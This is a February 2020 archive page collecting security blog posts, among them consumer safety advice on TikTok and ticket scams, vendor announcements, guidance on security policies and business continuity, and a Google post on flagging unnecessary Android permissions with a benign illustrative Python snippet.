Monthly Archives: February 2020

Is the TikTok App Safe for Kids?


Everyone’s talking about the TikTok app. In addition to talking, tweens and teens are swiping, laughing, and sharing TikTok videos. Meanwhile, parents are concerned with one thing: Is TikTok safe?

What is TikTok?

Based out of China, TikTok is a video-based social networking app that replaced the Musical.ly app, which ended its digital run in 2017. The app allows users to create an account, make and post short 15- to 60-second videos, and view, comment on, and share videos from other users. According to reports, TikTok has 1 billion active users in 155 countries. Approximately 60 percent of TikTok’s audience is between 16 and 24. Guidelines state that anyone 12+ can use the app, though there’s no age-verification process.

Why Do Kids Love TikTok?

TikTok is the latest and greatest digital hangout and has become the main channel for kids to discover new and creative ways to express themselves. They can follow their interests, be entertained, and be rewarded with views, likes, and shares for their artistic efforts. TikTok has built-in editing tools, free music and dialogue clips, and filters that make creating videos easy for any skill level. Users can share funny sketches, lip-sync videos, and spontaneous, personal raves or rants. According to app reviews posted by teens, TikTok is also a go-to creative outlet, a place to de-stress, and a confidence-builder.

What are the risks?

Apps aren’t inherently risky. Rather, it’s the way individuals use an app that puts themselves or others at risk. That’s why understanding how your kids engage on TikTok, and how to make the experience as safe as possible, is important. Here are some of the risks your child could encounter on TikTok:

Contact from strangers. According to news reports, predators use TikTok to connect with kids. Anyone who follows a TikTok user can privately message them and initiate private conversations outside of the app.

Exposure to mature content and lyrics. Apps attract users of all ages, which means if your child has a TikTok account, he or she has access to the public video feed. With 1 billion users, your child will likely see videos containing sexually suggestive or explicit images and hear explicit lyrics (we saw and heard plenty). They may even unknowingly use music clips for their videos that contain explicit lyrics.

Spam and malware. Recent reports reveal software flaws that could potentially open up TikTok accounts to a range of malicious attacks. Researchers say hackers could have exploited the flaws to send legitimate-looking text messages loaded with malware, make private videos public, and access personal data.

Excessive screentime. TikTok is a curiosity magnet for kids, which can lead to excessive screen time, lack of sleep, and a host of other negative outcomes from too much time online.


Cyberbullying. TikTok users have been known to create “cringe compilations,” which are videos they deem to be odd, uncool, or cringe-worthy. Several of these cruel compilations have been posted outside of TikTok and have gone viral.

Quest for likes. As with any social network, some users can become preoccupied with amassing views, likes, and followers. This obsession can lead to bad decisions, risky behavior (such as challenges), cyberbullying, and sharing harmful content.

Oversharing. Some kids share their daily activities through TikTok videos and inadvertently expose personal information such as their school, their location, home address, and other personal data.

10 Family Safety Tips

Should you allow your child to use TikTok? The answer to that question depends on a few things, including the age of the child using the app and how they use it. Here are a few tips that may help in that decision.

  1. Download the app. The best way to understand TikTok is to download it, create an account, and explore. Take some solo time to search a few hashtags, scroll some feeds, and get a feel for the content. Visit the app’s safety center for an overview of safety tools. Visit the privacy center to see how your child’s data is being used.
  2. Go through the app together. Sit and browse content with your child. Discuss the pros and cons of the content and how it does or doesn’t align with your family’s digital ground rules.
  3. Max privacy settings. By making a TikTok account private, only approved followers (known friends) can view your child’s videos or send your child messages. When an account is public, anyone can comment, send messages, or share your child’s videos.
  4. Explore restricted mode. TikTok has a Restricted Mode for minors that will allow you to filter out inappropriate content.
  5. Explore Family Safety Mode. This TikTok feature allows a parent to link their TikTok account to their child’s to manage screen time, direct messages, set restrictions, and control friend and comment filters.
  6. Control interactions. Users can disable comments on a specific video, block people they don’t know from following them, and report abuse.
  7. Monitor social circles. Kids can change privacy settings and eventually be wooed into making more connections and getting more exposure. Consider monitoring who your child follows and who is following them. Consider the TikTok influencers they follow and the type of content they share.
  8. Monitor screen time. It’s easy to burn through countless hours on TikTok. The app has a digital wellbeing element that alerts users every two hours. Consider filtering software that adds another way to set screen limits.
  9. Talk about being an upstander. Creating and sharing original content online takes courage — and attracts bullies, making TikTok a potentially unsafe environment for kids. Encourage your child to be an upstander online and offer encouragement and support to peers when needed.
  10. Block the app. If you determine TikTok’s content isn’t a good fit for your family or that the risks outweigh the opportunities, both Android and iOS have built-in parental controls in Settings that allow you to block any app (consider rechecking these settings weekly).

One look at today’s headlines, and it’s tempting for a parent to want to delete every app like TikTok. Only we know a similar app will soon surface. Another approach is to jump into the digital mix. Know what apps your kids love and why. Understand how they use their favorite apps and who they are talking to. And, always remember: It’s never too early or too late to start these critical conversations with your kids. You’ve got this, parents!

The post Is the TikTok App Safe for Kids? appeared first on McAfee Blogs.

Posture management: Cloud security tools rise in wake of breaches

High-profile breaches have sparked interest in an emerging class of security software. The technology, named cloud security posture management (CSPM), scours cloud environments and alerts staff to configuration issues and compliance risks, most of which stem from human error.

Exhibit A of this type of gaffe occurred at Capital One in 2019, when a former Amazon Web Services (AWS) employee exploited a misconfigured Web Application Firewall (WAF) the financial service provider was using as part of its operations hosted in AWS, exfiltrated data and stored it on GitHub. In 2018, both a Walmart partner and GoDaddy were exposed when they left AWS storage instances accessible via the internet.


Helping Developers with Permission Requests


User trust is critical to the success of developers of every size. On the Google Play Store, we aim to help developers boost the trust of their users by surfacing signals in the Developer Console about how to improve their privacy posture. Towards this aim, we surface a message to developers when we think their app is asking for a permission that is likely unnecessary.

This is important because numerous studies have shown that user trust can be affected when the purpose of a permission is not clear [1]. In addition, research has shown that when users are given a choice between similar apps, and one of them requests fewer permissions than the other, they choose the app with fewer permissions [2].

Determining whether or not a permission request is necessary can be challenging. Android developers request permissions in their apps for many reasons - some related to core functionality, and others related to personalization, testing, advertising, and other factors. To make this determination, we identify a peer set of apps with similar functionality and compare a developer’s permission requests to those of their peers. If a very large percentage of these similar apps are not asking for a permission, and the developer is, we then let the developer know that their permission request is unusual compared to their peers. Our determination of the peer set is more involved than simply using Play Store categories. Our algorithm combines multiple signals that feed Natural Language Processing (NLP) and deep learning technology to determine this set. A full explanation of our method is outlined in our recent publication, entitled “Reducing Permission Requests in Mobile Apps”, which appeared at the Internet Measurement Conference (IMC) in October 2019 [3]. (Note that the threshold for surfacing the warning signal, as stated in this paper, is subject to change.)

We surface this information to developers in the Play Console and we let the developer make the final call as to whether or not the permission is truly necessary. It is possible that the developer has a feature unlike all of its peers. Once a developer removes a permission, they won’t see the warning any longer. Note that the warning is based on our computation of the set of peer apps similar to the developer’s. This is an evolving set, frequently recomputed, so the message may go away if there is an underlying change to the set of peer apps and their behavior. Similarly, even if a developer is not currently seeing a warning about a permission, they might in the future if the underlying peer set and its behavior changes. An example warning is depicted below.

This warning also helps to remind developers that they are not obligated to include all of the permission requests occurring within the libraries they include inside their apps. We are pleased to say that in the first year after deployment of this advice signal nearly 60% of warned apps removed permissions. Moreover, this occurred across all Play Store categories and all app popularity levels. The breadth of this developer response impacted over 55 billion app installs [3]. This warning is one component of Google’s larger strategy to help protect users and help developers achieve good security and privacy practices, such as Project Strobe, our guidelines on permissions best practices, and our requirements around safe traffic handling.
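The peer comparison described above, reduced to its core step as an added illustration (this is not Google's code): given an app's declared permissions and a set of functionally similar peer apps, flag the permissions that almost none of the peers request. The peer set is assumed to be already computed (the NLP and deep-learning step that derives it is out of scope), the apps are constructed samples, and the 5% flagging threshold is an assumption, since the production threshold from the IMC paper is subject to change.

```python
# Added illustration (not Google's code): compare one app's declared permissions
# against a set of functionally similar peer apps and flag the permissions that
# almost none of the peers request. The peer set is assumed to be given, the apps
# are constructed samples, and the 5% threshold is an assumption.
from collections import Counter
from typing import Dict, List, Set

INTERNET = "android.permission.INTERNET"
CAMERA = "android.permission.CAMERA"
FINE_LOCATION = "android.permission.ACCESS_FINE_LOCATION"
READ_CONTACTS = "android.permission.READ_CONTACTS"
READ_PHONE_STATE = "android.permission.READ_PHONE_STATE"


def build_sample_peers() -> Dict[str, Set[str]]:
    """Construct 20 peer apps (sample data, not real Play Store apps).

    All 20 declare INTERNET, 18 declare CAMERA, 6 declare
    ACCESS_FINE_LOCATION, exactly one declares READ_PHONE_STATE and
    none declares READ_CONTACTS.
    """
    peers: Dict[str, Set[str]] = {}
    for i in range(20):
        perms = {INTERNET}
        if i < 18:
            perms.add(CAMERA)
        if i < 6:
            perms.add(FINE_LOCATION)
        if i == 19:
            perms.add(READ_PHONE_STATE)
        peers[f"peer-{i:02d}"] = perms
    return peers


# The developer's app under review (constructed sample). It declares two
# permissions that are rare or absent among its peers.
SAMPLE_APP_PERMISSIONS: Set[str] = {
    INTERNET, CAMERA, FINE_LOCATION, READ_CONTACTS, READ_PHONE_STATE,
}


def permission_counts(peers: Dict[str, Set[str]]) -> Counter:
    """How many peer apps declare each permission."""
    return Counter(p for perms in peers.values() for p in perms)


def unusual_permissions(
    app_perms: Set[str],
    peers: Dict[str, Set[str]],
    max_peer_percent: int = 5,
) -> Dict[str, int]:
    """Return {permission: number of peers declaring it} for every permission
    the app declares that at most `max_peer_percent` of the peers declare.

    Integer arithmetic avoids float rounding at the boundary
    (e.g. 1 of 20 peers is exactly 5%).
    """
    if not peers:
        raise ValueError("peer set is empty; no comparison is possible")
    counts = permission_counts(peers)  # missing keys count as 0
    n = len(peers)
    return {
        p: counts[p]
        for p in sorted(app_perms)
        if 100 * counts[p] <= max_peer_percent * n
    }


def format_warnings(flagged: Dict[str, int], n_peers: int) -> List[str]:
    """Render developer-facing warning lines, one per flagged permission."""
    return [
        f"{perm}: requested by {count} of {n_peers} similar apps; "
        f"confirm this permission is needed by your app"
        for perm, count in flagged.items()
    ]


if __name__ == "__main__":
    peers = build_sample_peers()
    flagged = unusual_permissions(SAMPLE_APP_PERMISSIONS, peers)
    for line in format_warnings(flagged, len(peers)):
        print(line)
    # The peer set is recomputed over time: once two more peers that declare
    # READ_PHONE_STATE join the set, that warning goes away on its own.
    peers["peer-20"] = {INTERNET, READ_PHONE_STATE}
    peers["peer-21"] = {INTERNET, READ_PHONE_STATE}
    print(sorted(unusual_permissions(SAMPLE_APP_PERMISSIONS, peers)))
```

The second run in the `__main__` block shows the behaviour the text describes: the READ_PHONE_STATE warning disappears without any change to the app, purely because the peer set changed.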
Acknowledgements
Giles Hogben, Android Play Dashboard and Pre-Launch Report teams

References

[1] Modeling Users’ Mobile App Privacy Preferences: Restoring Usability in a Sea of Permission Settings, by J. Lin, B. Liu, N. Sadeh and J. Hong. In Proceedings of the USENIX Symposium on Usable Privacy and Security (SOUPS), 2014.
[2] Using Personal Examples to Improve Risk Communication for Security & Privacy Decisions, by M. Harbach, M. Hettig, S. Weber and M. Smith. In Proceedings of the SIGCHI Conference on Human Factors in Computing Systems (CHI), 2014.
[3] Reducing Permission Requests in Mobile Apps, by S. T. Peddinti, I. Bilogrevic, N. Taft, M. Pelikan, U. Erlingsson, P. Anthonysamy and G. Hogben. In Proceedings of the ACM Internet Measurement Conference (IMC), 2019.

How to develop a robust cyber security policy

Technological defences and staff training are two of the most frequently touted measures for preventing data breaches, but their effectiveness is dependent on the way organisations implement them.

This is a lesson organisations must learn quickly amid the COVID-19 pandemic, with a series of new information security risks surrounding their new, temporary work set-ups. Many employees are being asked to work from home, including some who are using their personal devices.

Meanwhile, some organisations are already seeing depleted workforces due to illness or furloughs, meaning the remaining staff have to pick up more of the slack – and with IT teams having less oversight over the now-dispersed organisational infrastructure, there is less they can do to prevent the mounting threat of cyber attacks.

So how can you stay on top of these requirements during this turbulent time? The answer is to create or update a cyber security policy.

What is a cyber security policy?

A cyber security policy outlines an organisation’s cyber security defence strategy. Specifically, it explains the assets that must be protected, the threats to those assets and the controls that have been implemented to tackle them.

It’s only by documenting these that you can be sure that your organisation is approaching cyber security comprehensively and efficiently.


What a cyber security policy should include

All cyber security policies should include information on:

  • Which controls the organisation has implemented and the threats they address. For example, endpoints should be protected with antivirus software and firewalls
  • How updates and patches will be applied to limit the attack surface and plug application vulnerabilities. For example, organisations should regularly update browser, operating system and other Internet-facing applications
  • How data will be backed up. For example, organisations might choose to automatically back up their data to an encrypted Cloud server with multi-factor authentication

Cyber security policies should also identify who issued the policy, who is responsible for maintaining and enforcing it, who will respond to and resolve security incidents and which users have admin rights.


Employees and your cyber security policy

No matter how resilient your cyber security strategy is, you must always account for employees’ susceptibility to mistakes.

This might be the result of carelessness – such as misplacing files – or the result of targeted attacks from crooks. Phishing is one of the most common tactics in cyber crime because it circumvents many of the measures that organisations adopt to protect themselves, instead targeting employees directly.

Those who are unable to spot the signs of a malicious email will expose their sensitive information or leave the organisation open to catastrophic damage, such as a ransomware infection.

A cyber security policy will mitigate these risks, explaining to employees how they can protect sensitive information in various scenarios.

It should also address what happens when an employee doesn’t follow protocol. The specific actions will depend on the circumstances, but in most cases you’ll discipline, or possibly even fire, someone for deliberately flouting the rules.

However, as cyber security expert William H. Saito notes, you should be more cautious if the breach was an honest mistake:

Making a user who has been compromised feel like the ‘bad guy’ will only exacerbate an already bad situation.

It can lead to an environment in which people try to fix issues themselves or, worse, simply hide or ignore them and, most importantly, fail to communicate the incident quickly.

Organisations should also take some accountability when an employee makes a mistake, as it suggests that staff awareness training is lacking – whether that’s because the course content isn’t adequate or that sessions aren’t being performed regularly enough.

Part of your response to a security incident should be to review all of your defence measures, which includes your cyber security policy, training programmes and technologies.


Creating a cyber security policy

The content of your policy will depend on specific issues that you’ve identified when performing a risk assessment. That said, there are some universal issues that every organisation should account for, such as:

  • Software updates

Software providers regularly release patches to fix identified vulnerabilities. Once the update is announced, the vulnerability is made public – which means cyber criminals can look to exploit it.

That’s why organisations must have a patch policy in place to ensure updates are applied as soon as they are released.

  • Acceptable Internet use

Employees should be given a degree of leeway when it comes to accessing non-work-related content on company devices; after all, everyone is entitled to breaks.

However, organisations should be careful about just how much freedom they’re afforded. Untrustworthy sites, especially those that encourage users to download content, can be used to infect the device with malware.

  • Remote access

Remote working has become a standard part of modern business, thanks to the growing popularity of working from home and on the road.

Unfortunately, public Wi-Fi and employees’ home connections are less secure than your internal network, because they’re not subject to the rigorous defences you’ve implemented, such as firewalls.

Likewise, unlike your internal network, there’s no guarantee that only your employees have access.

As such, you should establish controls that prevent remote workers from accessing sensitive company information. This reduces the damage in the event that an employee’s account is compromised.

  • Creating strong passwords

Weak passwords are one of the biggest security problems that organisations face. Even though most employees are aware of the importance of strong login credentials, too many of them don’t think beyond obvious phrases such as ‘123456’ and ‘qwerty’.

Your cyber security policy should urge staff to create stronger passwords by outlining rules.

There are several schools of thought on what makes a strong password, the most common of which is that credentials should be at least eight characters long and combine upper- and lowercase letters, numbers and special characters.

The problem with this method is that the result can be hard to remember. “Did I replace the ‘o’ with a ‘0’ or the ‘l’ with a ‘1’?”, for example.

One way around this is to make your password a code; a popular technique is to use the first letter from a sentence that uses each of those characters. For instance, “My first son was born in July ’01” becomes “MfswbiJ’01”.

You can also use the length of your password to your advantage; every additional character you add is one that a cyber criminal has to guess.

As such, three random words – with no special characters or numbers – is often more secure than a complex cipher such as the example above.

Your policy doesn’t need to specify one approach over another; some employees will be more comfortable with one approach and others with an alternative. The important thing is that staff break out of the habit of simple passwords that can be cracked instantly.


Does your policy account for your new work environment?

The most significant change in the way organisations are operating during the COVID-19 pandemic is the number of employees working from home.

Remote workers face a wide variety of challenges – particularly when there is no one left in the office to pick up tasks that depend on the security benefits of working on the premises.

Our Remote Working Policy Template provides essential documentation on the issues you must address to protect you and your staff during the pandemic.

With this template, you can ensure that employees understand their responsibilities while working from home and take appropriate steps to keep their devices secure.

It includes guidance on topics such as password management, backups, the use of unauthorised software and device maintenance.



A version of this blog was originally published on 3 January 2018.

The post How to develop a robust cyber security policy appeared first on IT Governance UK Blog.

Burning Man Is Coming: How to Watch out for Ticket Scammers

As the winter months fade and spring begins to creep up, many millennials and Gen Zers set their sights on festival season. Whether they plan on attending Coachella, Stagecoach, Outside Lands, Lollapalooza, or Governor’s Ball, festivalgoers across the world anxiously begin to look for cheap or discounted tickets in the hope of enjoying these events as affordably as possible. This eagerness, however, provides scammers with an opportunity to scam attendees out of hundreds of dollars, as well as the experiences themselves. In fact, according to Threatpost, ticket scammers have recently set their sights on wishful Burning Man attendees.

How This Burning Man Scam Works

The dystopian, futuristic festival that is Burning Man takes place in late August through early September, attracting tens of thousands of people from around the world and all walks of life. While truly an immersive experience, the festival can be quite expensive. So, it’s no wonder that burners – the nickname given to festival attendees – would be eager to find the cheapest price for their tickets. With this scam in particular, fake Burning Man concert organizers are offering passes in what researchers say is a very convincing and sophisticated effort. These tricksters have set up a fake website that closely mimics the official Burning Man site to fool visitors into thinking it’s the real deal.

How to Stay Secure

Seasoned festivalgoers know that ticket scammers are out there. But as the traps become more sophisticated, it’s vital that they know how to spot “too good to be true” deals. To avoid being burned by tricksters, follow these tips:

  • Only buy tickets from reputable vendors. While purchasing a cheap ticket from a third-party vendor is tempting, buying a ticket from the actual festival site rather than one that offers a good deal is the way to go. If not, you risk not only losing money but also the festival experience.
  • Carefully inspect any site before entering payment details. Burning Man’s official website features event history, an invitation to collaborate, press releases, archives from past festivals, and more – so make sure to scan for a variety of pages to confirm that the site is the real deal. Adding to that, be sure to also inspect URLs for suspicious characters.
  • Use payment that’s protected. If for some reason you do fall victim to a scam, most credit card companies help you get your money back in the event of fraud. Additionally, PayPal offers buyer protection when paying for “Goods or Services” that allows you to request a chargeback, just as long as you don’t pay as “friends and family,” which comes with no buyer protection.
  • Monitor your online accounts. You’re never too young to start monitoring your credit! Be sure to regularly inspect your account for suspicious activity. If you do suspect your data or account has been compromised, place a fraud alert on your credit.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Burning Man Is Coming: How to Watch out for Ticket Scammers appeared first on McAfee Blogs.

How vulnerability disclosure keeps you and your family safe

Surrounded by smart home devices as well as apps which integrate with other services, we are entering an age of consumer technology where everything can talk to everything. For most consumers, this will just feel like the next logical step in a technological advancement which has been going on for decades.

This year, we will see more companies announce more new smart products than ever before, and we know that while some of these devices and services will become enormously successful, others will sink without a trace. From doorbells, kitchen scales and coffee cups to fridges and even cars, thousands of companies are racing to build the next generation of smart – and nobody knows for sure what will take off.

What we do know for sure, however, is the potential threat that it can represent – or, for cybercriminals, the opportunity. While, for home users, having products which talk to each other goes along with portability and power as a part of general technological progress, in terms of security this change is unlike anything else. Every IoT device we buy is another route that an attacker might use to do damage and make money. With so many options around, how can you buy in to the convenience of connected devices in your home while also ensuring that you’re keeping yourself safe? Fundamentally, it’s not about whether products might have vulnerabilities, but how companies react when vulnerabilities are found.

Everything connected

There is no single type of cyberattack used against connected consumer technology. At their simplest, attacks on unsecured IoT consumer devices might affect only the device itself. For instance, a smart lightbulb might be taken over and its internet connection used as a tool to attack other targets: concerning, but not directly damaging to the lightbulb’s owner. These attacks are more troubling, however, when the attacker is stealing not just an internet connection, but its owner’s identity by compromising their login details.

An even more serious concern for users will be situations where a device’s functionality can be controlled by somebody other than the owner. Recently, McAfee’s Advanced Threat Research team found a worrying example of this where a smart garage door can be tricked into opening when the owner thinks they are closing it remotely – for instance, after opening it to allow a package to be delivered while they are at work. Our team also found a vulnerability in a smart plug which, when carefully exploited, can potentially grant access to anything else on the same home network, such as computers, televisions, and security systems. And, most recently, we also identified a new vulnerability in autonomous vehicles which I discuss in a previous blog.

Working together

Finding vulnerabilities which an attacker might be able to take advantage of is a difficult and highly specialised job. At McAfee, our research teams use techniques similar to those that criminals might employ to try and get there first.

Of course, telling the world about these problems as soon as we find them would give criminals a chance to use them before the companies that make the products have a chance to solve them. That’s why we, like other organisations doing this kind of work, follow a responsible disclosure policy: first, we tell the company concerned about what we found, and then, after a set period of time, we log a public notice (like this one for the smart plug vulnerability) which puts this information in the public domain. That way, businesses have both the time and the motivation to fix the flaw.

The good news is that all of this gives us specific steps to take which can help ensure that our connected lives are also secure lives:

  • Research products up front: searching for the product name plus ‘vulnerability’ should quickly show whether any research teams have identified problems with it, and whether they’ve been fixed.
  • Give cybersecurity researchers time: while brand new products are exciting, choosing a device which has been on the market for some time makes it more likely that any major vulnerabilities will have been discovered.
  • Keep your technology updated: being connected means that problems with IoT devices are usually fixable with new software, so regularly checking for any new updates will minimise the chances of being caught out.

While groups like the McAfee Advanced Threat Research team are working hard to find potential attacks, it is also critical that the companies making these products have what we call vulnerability disclosure programmes. These programmes are used to encourage research groups to probe the security of the products and reassure the world that the company will respond positively where vulnerabilities are found. These steps, after all, are only useful if companies are actively seeking to ensure that their products are secure.

For example, leading smart lightbulb manufacturer Philips has a dedicated webpage explaining how to safely report a vulnerability to the company – meaning that if and when a problem is found, the details will be seen quickly by the right people and, hopefully, remedied. Apple and Google go one step further by offering bounties of up to $1 million for finding problems in their software, incentivising researchers to throw everything they have at uncovering issues. While it cannot guarantee safety, a vulnerability disclosure programme should be seen as a precondition for buying a connected device from a manufacturer.

By being smart about your home’s smart devices, together with familiar measures such as using strong, unique passwords, you can enjoy the convenience of connectivity while also protecting yourself online.

The post How vulnerability disclosure keeps you and your family safe appeared first on McAfee Blogs.

McAfee Named a 2020 Gartner Peer Insights Customers’ Choice for CASB


The McAfee team is proud to announce today that, for the third year in a row, McAfee was named a 2020 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers (CASB) for its MVISION Cloud solution. As the only CASB vendor to achieve this distinction three years in a row, we are so honored as customer feedback is essential in shaping our products and services.

In its announcement, Gartner explains, “The Gartner Peer Insights Customers’ Choice is a recognition of vendors in this market by verified end-user professionals, taking into account both the number of reviews and the overall user ratings.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.


For this distinction, a vendor must have a minimum of 50+ published reviews with an average overall rating of 4.5 stars or higher. McAfee received 90 reviews and an overall 4.6 rating for McAfee MVISION Cloud as of February 20, 2020.

Here are some excerpts from customers that contributed to this distinction:

“Best Option For Securing Data On Cloud”

“It provides high security of data and prevents the data leak. It’s not messy at all, UI is very simple with great dashboard where you can see anything like which system is browsing what kind of websites.”
Data and Analytics, Services Industry: Read full review here

“Cloud Visibility And Control Using MVision”

“The McAfee MVision product suite is a market leading solution, does what it says. Our ability to control shadow IT, provide visibility around sensitive data and control cloud applications has greatly improved as a result of the tool. The McAfee professional services team are also very knowledgeable and have been on hand to assist through the entire project lifecycle into operation.”
VP, Information Security Officer, Healthcare Industry: Read full review here

You can read all reviews for McAfee here

Everyone at McAfee is deeply proud to be named by customers as a 2020 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers. In October 2019, McAfee was named a Leader by analysts in Gartner’s “Magic Quadrant for Cloud Access Security Brokers.” Read the 2019 Magic Quadrant for Cloud Access Security Brokers here

To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights’ Customers’ Choice announcement for CASB. To all of our customers who submitted reviews, thank you! These reviews mold our products and our customer journey, and we look forward to building on the experience that earned us this distinction!

The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post McAfee Named a 2020 Gartner Peer Insights Customers’ Choice for CASB appeared first on McAfee Blogs.

Global Managed Detection and Response: Managing EDR Without the Red Bull

Staying on top of threats 24/7, 365 days a year can overwhelm the best SOC analysts. The need for constant vigilance of cyber threats, not to mention security tasks such as new tool installs, running reports and investigations, followed by reporting to exec levels is becoming unsustainable – just like your supply of energy drinks.

McAfee’s new Global Managed Detection and Response (MDR) service with DXC Technology will provide 24/7 critical alert monitoring, managed threat hunting, advanced investigations, and threat disruption 365 days a year.

An ESG survey reveals the struggles SOCs face to improve security postures with limited talent and resources:

  • 58% of organizations cite employee skills as a key security effectiveness gap
  • 72% say analytics is more difficult than two years ago
  • 70% report having many manual processes as a limiting factor

Global Managed Detection and Response supports McAfee’s “We put the customer first” mantra, freeing SOC analysts from unnecessary operational burdens and empowering security teams to strategically fight adversaries.

McAfee MVISION EDR and endpoint protection products are at the core of this new MDR service. MVISION EDR is an advanced cloud-delivered EDR solution that leverages McAfee’s massive threat intelligence data to provide visibility and advanced threat detection capabilities. In addition to identifying threats, MVISION EDR provides AI-guided investigation that helps analysts make sense of the alerts and guides the investigation process, automating the time-intensive task of collecting and pinpointing key artifacts that are vital to the incident. With the ability to scale to the size of any enterprise, MVISION EDR is the perfect solution to detect and prevent attacks.

DXC Technology is McAfee’s first partner providing threat hunting, advanced investigation and remediation coordination, and will introduce in the future a complete managed service with 24/7 critical alert monitoring.

DXC Technology has a global presence with the support of 3,500-plus security professionals with deep specializations including SOC analytics, forensic investigation, and threat intelligence.

Combining the global security expertise of DXC Technology with McAfee’s automated, AI-guided investigations lets SOC analysts focus on resolving the incident rather than losing time sifting through noisy alerts. Inspired by the power of working together, McAfee and DXC Technology are freeing your teams from unnecessary operational burden and empowering them to strategically fight adversaries. This level of outside expertise can help you improve your security posture while keeping costs in check.

Whether you’re on the floor at RSA or at the W lobby bar, McAfee’s new Global Managed Detection and Response service with DXC Technology can turn your security conversation from how overwhelmed you are, to how much time you’ll have to disengage as well as how much money you’re going to save on Red Bull.

Learn more here.


The post Global Managed Detection and Response: Managing EDR Without the Red Bull appeared first on McAfee Blogs.

Can Mobile Networks Connect First Responders in Remote Areas?

The high plateaus of Colorado’s Rocky Mountains, known for panoramic vistas, wildlife, old gold mines and sports of all kinds, are attracting new pioneers: engineers working to improve emergency communications. First responders face many communications challenges, including a lack of cell towers in uninhabited places and incompatible equipment. Public safety agencies need to find ways to share voice, text, instant messages, video and data reliably while responding to wildland fires and other emergencies. Researchers with the National Institute of Standards and Technology (NIST), in

How to write a business continuity plan: the easy way

Earthquake. Virus. Cyber attack. The threat of disruption looms over organisations more than ever, thanks to the increasing use of technology in business processes, consumer expectations and the rapid rise in cyber crime.

You’ll rarely get advance warning about when a disruption will occur, which is why you need a BCP (business continuity plan).

In this blog, we explain how a BCP works, what it covers and how to create one.


What is a business continuity plan?

A BCP outlines the processes and procedures that an organisation must follow in the event of a disruption.

The plan must identify relevant risks that could cause issues, be they cyber attacks, internal vulnerabilities, weather events or technological problems.

Each identified risk should be accompanied with a set of temporary measures or quick fixes that ensure the most important business operations remain functional.

Organisations’ top priorities tend to be their technologies – and for good reason. Network connections, online systems, phone lines, network drives, servers and business applications are all vulnerable to a range of disruptions and can cause huge headaches if they are compromised.

But business continuity planning isn’t just about recovering IT functions. It’s primarily concerned with critical activities that, if disrupted, could immediately jeopardise your productivity or the availability of your services.

In that regard, business continuity considers IT one of several critical resources for preserving those activities.

However, restoring your IT may take some time, so you should have a plan on how to manage in the meantime. Such temporary solutions may well be lo-fi, such as completing processes with pen and paper.

Whatever methods you choose, they must be documented in a BCP so that employees know how to proceed.


Why is a business continuity plan important?

The most obvious reason to implement a BCP is to ensure that your organisation remains productive in the event of a disruption.

Customers must still be able to use your services, employees must be able to continue doing their job and you can’t allow yourself to face a huge backlog of work as delays continue.

But business continuity isn’t only about short-term goals. The cyber security landscape has become increasingly volatile in recent years, with cyber crime continuing to spiral and organisations’ reliance on technology leading to vast numbers of accidental and deliberate data breaches.

As a result, organisations need to prove to customers and stakeholders that they are prepared for anything.

Business continuity is especially important for OES (operators of essential services) and DSPs (digital service providers), because a disruption to them can affect large numbers of people and organisations that depend on their services.

To ensure that such organisations are sufficiently prepared for risks, the EU adopted the NIS Directive, which was transposed into UK law as the NIS (Network and Information Systems) Regulations 2018.

DSPs within the Regulations’ scope are explicitly required to put business continuity measures in place. Although the same isn’t true of OES, they should still consider implementing a BCP as a means of providing a more reliable service.


Benefits of a business continuity plan

Creating a BCP will make it easier for your organisation to cope in a crisis and minimise the disruption for you and your customers.

A BCP can also reduce or even avoid the risk of losing revenue if you are hit with a disruption. Returning to business as usual promptly minimises the time that your organisation is unable to operate and therefore unable to generate revenue.

But beyond these reasons, you should also consider the BCP’s ability to:

  • Protect your organisation’s reputation

A fast and efficient response to disruption shows the public how well you operate. This mitigates any negative sentiment that accompanies the loss of productivity, and it might even improve your reputation.

  • Boost employees’ morale

No one wants to work in a chaotic environment, so your staff will be pleased to know that management has a plan in case things go wrong.

If the plan is well written (which we’ll show you how to do shortly), everyone in the organisation will be accounted for, proving to employees that management has considered their needs.

  • Build your relationship with third parties and subsidiaries

An effective BCP demonstrates that the organisation is being run well from top to bottom, which will encourage anyone that you work with.

It shows that you are a reliable partner that has taken into account its responsibilities to customers, employees and third parties.


Who should have a business continuity plan?

All organisations, no matter their size, should create a BCP. Consider it a small investment that will save you a fortune when you suffer a data breach – and it is a matter of when, rather than if.

In the past year alone, 32% of UK organisations identified a cyber security breach or attack, according to the DCMS Cyber Security Breaches Survey 2019. The average cost of a breach, meanwhile, has risen year on year.

Organisations spent £4,180 on average responding to security incidents in 2019, compared with £3,160 in 2018 and £2,450 the year before that.

The larger your organisation, the higher these costs will be. The report found that medium-sized businesses spent £9,270 on data breach recovery, and large businesses spent £22,700.


Key features of an effective business continuity plan

1. Purpose and scope

Your first task is to define the purpose and scope of the plan. This is especially relevant if your organisation comprises several subsidiaries or is based in different locations, as each one will have its own requirements.

If this is the case, it’s up to you to decide whether to create one plan that covers each subsidiary/location separately or to focus on just one part of your business.

2. Responsibilities

The next step is to decide which employee(s) will be responsible for enacting the plan. You might opt to put one person in charge of the plan or delegate responsibility to people across your organisation.

Small organisations might be able to get away with a single leader, as there’s a good chance that a senior member of staff will have oversight of every department and its needs. However, if that’s not the case, a group of employees will need to share responsibility.

You also need to identify who has the authority to approve spending outside the normal departmental budget. This could be the same person (or people) responsible for enacting the plan, or it could be a specific duty assigned to someone else.

3. Plan invocation

This step defines when and how the plan will take effect. After all, it’s not always clear that a serious (and possibly planned-for) disruption has occurred; it’ll often begin with, say, the office lights going out and employees looking across the room at each other asking: ‘What’s going on?’

